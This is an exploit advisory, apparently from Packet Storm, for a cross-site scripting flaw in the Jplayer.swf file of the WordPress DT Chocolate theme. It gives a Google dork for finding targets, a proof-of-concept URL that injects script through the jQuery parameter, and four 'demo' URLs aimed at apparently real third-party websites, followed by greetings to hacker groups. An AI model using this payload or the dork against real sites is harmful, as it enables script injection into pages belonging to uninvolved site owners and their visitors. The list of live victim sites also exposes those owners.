WordPress DT Chocolate Cross Site Scripting

2014-01-13T00:00:00
ID PACKETSTORM:124756
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2014-01-13T00:00:00

Description

                                        
                                            `[+] Author: TUNISIAN CYBER  
[+] Exploit Title: WordPress DT Chocolate (jplayer.swf) Cross Site Scripting vulnerability  
[+] Date: 13-01-2014  
[+] Category: WebApp  
[+] Google Dork: :inurl:"/wp-content/plugins/nextgen-gallery/"  
[+] Tested on: KaliLinux  
[+} Friend's blog: www.na3il.com  
  
########################################################################################  
+Exploit:  
Wordpress Theme DT Chocolate suffers from an xss vulnerability.  
+P.O.C:  
127.0.0.1/[PATH]/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/TUNISIAN CYBER/)//  
  
Demo:  
http://www.impala-miami.com/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//  
http://reportagesphotos-kaddouchmagali.fr/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//  
http://www.laluzdeunangel.com/nuevo/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//  
http://orianneboulage.fr/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/TUNISIAN%20CYBER/)//  
./3nD  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  
`